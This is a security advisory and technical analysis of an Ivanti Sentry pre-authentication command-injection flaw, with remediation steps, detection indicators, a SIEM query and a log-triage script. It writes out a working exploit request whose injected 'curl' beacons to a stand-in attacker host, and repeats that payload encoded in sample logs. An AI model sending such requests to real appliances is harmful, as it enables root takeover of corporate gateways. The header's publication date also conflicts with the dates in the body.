
CVE-2026-10520: Ivanti Sentry — Pre-Authentication OS Command Injection (CVSS 10.0)

CVE Details

CVE ID CVE-2026-10520
CVSS Score 10
Severity Critical
Vendor Ivanti
Product Sentry (formerly MobileIron Sentry)
Patch Status Available
Published June 12, 2026
EPSS Score 47.9%
CISA Patch Deadline June 14, 2026

Background

Ivanti Sentry — sold as MobileIron Sentry before the 2020 rebranding — is an enterprise mobile device management (MDM) gateway. It acts as the authentication and proxy layer between mobile devices and internal corporate resources: Exchange email, SharePoint, internal web applications, and EAS endpoints. Large organisations deploy it as the primary access control point for their entire mobile device fleet. This attack surface is why Ivanti products are a persistent target for threat actors: a compromised Sentry appliance gives attackers a position inside the enterprise perimeter, authenticated as the MDM gateway to internal systems.

CVE-2026-10520 is a pre-authentication OS command injection vulnerability in the Sentry management interface (MICS — Mobility Infrastructure Configuration Service). It received a CVSS score of 10.0, the framework’s maximum, reflecting zero-privilege requirements, no user interaction needed, and a direct path to root-level command execution on the appliance.

Ivanti published its advisory on 9 June 2026. WatchTowr published a full technical analysis and proof-of-concept exploit the following day. By 11 June, the Shadowserver Foundation had confirmed active exploitation in the wild, with at least two of nineteen scanned vulnerable instances already backdoored. CISA added CVE-2026-10520 to the Known Exploited Vulnerabilities catalog on 11 June with a patch deadline of 14 June 2026 — an unusually short three-day window reflecting the severity of active exploitation.

A second vulnerability was patched in the same advisory: CVE-2026-10523, an authentication bypass allowing unauthenticated creation of arbitrary administrative accounts (CVSS 9.9). Both are addressed by the same patch releases. This analysis focuses on CVE-2026-10520.

Affected Versions

Product          Vulnerable Version    Fixed Version
Ivanti Sentry    10.5.1 and prior      10.5.2
Ivanti Sentry    10.6.1 and prior      10.6.2
Ivanti Sentry    10.7.0                10.7.1

Ivanti’s advisory lists only the 10.x branches; it does not state whether 9.x or earlier is affected. Those releases are beyond vendor support and will receive no fix, so organisations still running them should treat them as vulnerable and plan an upgrade rather than wait for confirmation.

Vulnerability Details

Affected component: ConfigServiceController class within mics.war, the management web application deployed on Sentry appliances.

Vulnerable endpoint: POST /mics/api/v2/sentry/mics-config/handleMessage

Root cause: The handleMessage() method accepts a user-supplied message parameter via an unauthenticated HTTP POST request. The application passes this parameter directly to a command processing routine without sanitising shell metacharacters or validating allowed command types. This is a textbook CWE-78 (OS Command Injection) flaw: user-controlled data reaches an OS command execution context without escaping.

Exploitation mechanics:

An attacker sends an HTTP POST request to the MICS management interface containing an XML payload in the message parameter with embedded command injection:

POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1
Host: sentry.example.com
Content-Type: application/x-www-form-urlencoded

message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>id; curl http://attacker.example.com/beacon</reqandres></commandexec>

The MICS service processes this request without authentication before validating the command structure. The injected shell commands execute with the privileges of the MICS service process — root on Ivanti Sentry appliances.
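The pattern described above, reduced to its essentials, beside a hardened form. This is an added illustration written for this page, not Ivanti’s code: the Java implementation inside mics.war is not reproduced here, so the message layout is modelled on the request shown above and the function names, the allowlist and the sample messages are assumptions. It runs `echo` rather than `id` and `curl` so that it is safe to execute locally.

```python
import re
import subprocess
import xml.etree.ElementTree as ET

# Constructed message bodies (already URL-decoded), shaped like the request above.
INJECTED_MESSAGE = (
    "execute system /configuration/system/commandexec "
    "<commandexec><index>1</index>"
    "<reqandres>echo hello; echo injected</reqandres></commandexec>"
)
BENIGN_MESSAGE = (
    "execute system /configuration/system/commandexec "
    "<commandexec><index>1</index><reqandres>echo hello</reqandres></commandexec>"
)


def parse_message(message: str):
    """Split 'execute <type> <path> <xml>' and pull the <reqandres> text out of the XML."""
    verb, ctype, path, xml = message.split(" ", 3)
    root = ET.fromstring(xml)
    return verb, ctype, path, root.findtext("reqandres", default="")


def handle_message_vulnerable(message: str) -> str:
    """CWE-78 pattern (hypothetical): no authentication check, and the <reqandres>
    text reaches a shell unchanged, so ';', '|', '$()' become extra commands."""
    _, _, _, req = parse_message(message)
    return subprocess.run(req, shell=True, capture_output=True, text=True).stdout


# Hardened form: the caller must be authenticated, the command name must be on an
# allowlist that maps to a fixed argv, every argument must match a tight grammar,
# and nothing is ever handed to a shell (shell=False, argv list).
ALLOWED_COMMANDS = {"echo": ["echo"], "hostname": ["hostname"]}  # assumed allowlist
SAFE_ARG = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def handle_message_hardened(message: str, authenticated: bool) -> str:
    if not authenticated:
        raise PermissionError("management commands require an authenticated admin session")
    verb, ctype, _path, req = parse_message(message)
    if verb != "execute" or ctype != "system":
        raise ValueError("unsupported message type")
    parts = req.split()
    if not parts:
        raise ValueError("empty command")
    name, *args = parts
    if name not in ALLOWED_COMMANDS:
        raise ValueError(f"command not allowlisted: {name!r}")
    bad = [a for a in args if not SAFE_ARG.fullmatch(a)]
    if bad:
        raise ValueError(f"rejected argument(s): {bad}")
    argv = ALLOWED_COMMANDS[name] + args
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


def outcome(handler, *args) -> str:
    """Return the handler's stdout, or the name of the exception it raised."""
    try:
        return handler(*args)
    except (ValueError, PermissionError) as exc:
        return type(exc).__name__


if __name__ == "__main__":
    print("vulnerable, injected :", repr(outcome(handle_message_vulnerable, INJECTED_MESSAGE)))
    print("hardened, injected   :", outcome(handle_message_hardened, INJECTED_MESSAGE, True))
    print("hardened, benign     :", repr(outcome(handle_message_hardened, BENIGN_MESSAGE, True)))
    print("hardened, no session :", outcome(handle_message_hardened, BENIGN_MESSAGE, False))
```

The vulnerable handler prints both `hello` and `injected` because `;` was interpreted by `/bin/sh`; the hardened handler refuses the same message at the argument grammar before anything runs, and refuses every message when there is no authenticated session, which is the check the pre-authentication endpoint was missing.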

Exposure conditions: Ivanti’s advisory notes that exploitation requires the Sentry appliance to be in an “unmanaged state” with its MICS endpoints externally reachable. Deployments using mutual TLS (mTLS) with EPMM or restricting HTTPS access through Neurons for MDM render the MICS interface inaccessible to external actors. However, assessments of real-world deployment configurations suggest a significant proportion of Sentry appliances expose the MICS interface to broader network ranges than strictly necessary — including, in some cases, directly to the internet.

Exploitation in the Wild

WatchTowr’s analysis, published 10 June 2026, included a working Python-based proof-of-concept and demonstrated the vulnerability’s trivial exploitation characteristics. The PoC is publicly available on GitHub at watchtowrlabs/watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523.

The timeline from advisory to confirmed backdooring was exceptionally short:

Date            Event
9 June 2026     Ivanti advisory published; no exploitation confirmed at time of disclosure
10 June 2026    WatchTowr publishes technical analysis and working PoC exploit
11 June 2026    Shadowserver Foundation reports active exploitation; at least 2 of 19 scanned vulnerable instances confirmed backdoored
11 June 2026    CISA adds CVE-2026-10520 to KEV catalog; patch deadline set for 14 June 2026

Shadowserver’s confirmation that production instances were already backdoored — not merely scanned or probed — indicates the PoC was weaponised and deployed against real targets within approximately 24 hours of publication. The nature of the backdoors installed was not disclosed in public reporting at time of writing.

Ivanti products have a documented history of rapid weaponisation. CVE-2023-46805 and CVE-2024-21887 (Ivanti Connect Secure) were exploited as zero-days before their January 2024 disclosure, and mass exploitation followed within days of public PoC release; Mandiant attributed that activity to UNC5221 (China-nexus). No specific threat actor has been publicly attributed to CVE-2026-10520 exploitation as of this analysis.

Target context: Organisations with externally-accessible Sentry MICS interfaces are at highest risk. Internet-facing MDM gateway infrastructure is the attack profile most consistent with the exploitation confirmation from Shadowserver’s internet-wide scanning.

Patch and Remediation

Primary remediation: Upgrade to Ivanti Sentry 10.5.2, 10.6.2, or 10.7.1 as appropriate for your installed version. Download links are available from Ivanti’s support portal (hub.ivanti.com). CISA’s BOD 26-04 deadline for federal agencies is 14 June 2026; given confirmed active exploitation, treat this as an emergency upgrade outside normal patching cycles for all organisations.

Network-level mitigations (defence-in-depth, not a substitute for patching):

  1. Restrict MICS interface access: The MICS management interface should not be exposed to the internet. If it is currently reachable externally, immediately restrict access to known management IP ranges.

     # Verify which interfaces the MICS service (port 8443) is listening on
     ss -tlnp | grep ':8443'
     # or (older appliances)
     netstat -tlnp | grep ':8443'

     # Review firewall rules to confirm internet access to MICS is blocked
     iptables -L INPUT -n -v | grep 8443

  2. Enable mTLS with EPMM: If your deployment uses EPMM integration, enabling mTLS hardens the MICS interface against unauthenticated external access. This is consistent with Ivanti’s mitigation note in the advisory.

  3. WAF rules (interim only): Block POST requests to /mics/api/v2/sentry/mics-config/handleMessage from untrusted source addresses while the upgrade is prepared. WAF controls are insufficient as a standalone mitigation given the simplicity of the exploit.

Post-patch verification: After applying the patch, confirm the upgraded version number in the Sentry admin UI (System > About) and re-scan with a vulnerability scanner to verify resolution.

Detection

Web application logs — exploit attempts:

Monitor Sentry MICS web server logs for POST requests to /mics/api/v2/sentry/mics-config/handleMessage. Any unauthenticated POST to this endpoint from a source outside your management ranges is anomalous and warrants investigation. Note that a standard access log records the method, path and source address but not the POST body, so the payload-level indicators below require body capture at a reverse proxy, WAF or packet capture in front of the appliance. Look specifically for payloads containing:

  • XML <commandexec> tag sequences
  • Shell metacharacters (; | && || $()) within the message parameter
  • Download utility references (curl, wget) suggesting callback or dropper delivery

System-level indicators of compromise:

  • Unexpected processes spawned by the MICS service (Java/Tomcat parent, sh or /bin/bash child)
  • New user accounts on the appliance (/etc/passwd changes, lastlog anomalies)
  • Modified cron jobs or startup scripts (/etc/cron*, /etc/rc.local, /etc/init.d/)
  • Unusual outbound network connections from the appliance to external IP addresses
  • New files in web-accessible directories (web shells, droppers)
  • Evidence of persistence tooling: rootkits, modified binaries (compare against known-good hashes from clean installation)

Shadowserver scanning exposure check:

Verify whether your Sentry MICS interface is exposed to the internet using external scanning (Shodan, Censys, or Shadowserver’s exposure notification service). If your appliance appears in results, treat it as potentially compromised and conduct forensic review before or alongside patching.

Log aggregation query (SIEM), written as Splunk-style SPL; known_management_ip_ranges is a placeholder for your own CIDR list or lookup:

source="sentry_mics_access_log" method="POST" path="/mics/api/v2/sentry/mics-config/handleMessage"
| search NOT src_ip IN (known_management_ip_ranges)
| bin _time span=1h
| stats count, values(user_agent) AS user_agents BY src_ip, _time
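The same triage logic as the SIEM query above and the indicator list under “Web application logs”, run locally over log lines, for environments where a proxy or WAF in front of the appliance captures request bodies. This is an added example, not tooling from the page or from Ivanti: the log format (combined format with the raw POST body appended as a final quoted field), the management range 10.10.0.0/16 and the three sample lines are all constructed for the illustration. The source addresses are documentation ranges.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

TARGET_PATH = "/mics/api/v2/sentry/mics-config/handleMessage"
# Assumed management ranges; replace with the ranges that legitimately reach MICS.
MANAGEMENT_RANGES = [ipaddress.ip_network("10.10.0.0/16")]

# Constructed sample lines: combined log format plus the URL-encoded POST body as a
# trailing quoted field ("-" when there is no body). Tomcat's default access log
# does not record bodies, so this field exists only if something upstream adds it.
SAMPLE_LOG = """\
10.10.4.7 - - [11/Jun/2026:09:14:02 +0000] "POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1" 200 512 "Mozilla/5.0" "message=execute+system+%2Fconfiguration%2Fsystem%2Fstatus+%3Cstatus%2F%3E"
203.0.113.45 - - [11/Jun/2026:09:15:37 +0000] "POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1" 200 0 "python-requests/2.31" "message=execute+system+%2Fconfiguration%2Fsystem%2Fcommandexec+%3Ccommandexec%3E%3Cindex%3E1%3C%2Findex%3E%3Creqandres%3Eid%3B+curl+http%3A%2F%2Fattacker.example.com%2Fbeacon%3C%2Freqandres%3E%3C%2Fcommandexec%3E"
198.51.100.9 - - [11/Jun/2026:09:16:01 +0000] "GET /mics/ HTTP/1.1" 302 0 "curl/8.0" "-"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ua>[^"]*)" "(?P<body>[^"]*)"$'
)
# Shell metacharacters named in the indicator list: ; | && || $( and backticks.
METACHARS = re.compile(r"[;|&`]|\$\(")
DOWNLOADER = re.compile(r"\b(curl|wget)\b")


def parse_line(line: str):
    """Parse one log line; the body is URL-decoded so '+' and %XX become real characters."""
    m = LINE_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["body"] = unquote_plus(entry["body"]) if entry["body"] != "-" else ""
    return entry


def indicators_for(entry: dict) -> list:
    """Return the indicator names that apply to a POST against the vulnerable endpoint."""
    found = []
    src = ipaddress.ip_address(entry["ip"])
    if not any(src in net for net in MANAGEMENT_RANGES):
        found.append("external_source")
    body = entry["body"]
    if "<commandexec>" in body:
        found.append("commandexec_tag")
    if METACHARS.search(body):
        found.append("shell_metachar")
    if DOWNLOADER.search(body):
        found.append("download_utility")
    return found


def analyse(log_text: str) -> list:
    """Keep only POSTs to the handleMessage endpoint and attach indicators and a verdict."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if not entry or entry["method"] != "POST" or entry["path"] != TARGET_PATH:
            continue
        inds = indicators_for(entry)
        hits.append({
            "src_ip": entry["ip"],
            "ts": entry["ts"],
            "user_agent": entry["ua"],
            "indicators": inds,
            # Any hit from outside management ranges, or any payload indicator, is worth a ticket.
            "verdict": "alert" if inds else "baseline",
        })
    return hits


if __name__ == "__main__":
    for hit in analyse(SAMPLE_LOG):
        print(hit["verdict"], hit["src_ip"], hit["user_agent"], hit["indicators"])
```

The management-range request with a benign status message is reported as baseline; the request from 203.0.113.45 trips all four indicators (external source, `<commandexec>` tag, `;` in the decoded body, and `curl`), which is the profile to escalate for forensic review. The GET is ignored because only POSTs to the endpoint matter here. Because `unquote_plus` is applied before matching, attackers cannot hide `;` or `curl` behind `%3B` or `+` encoding.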
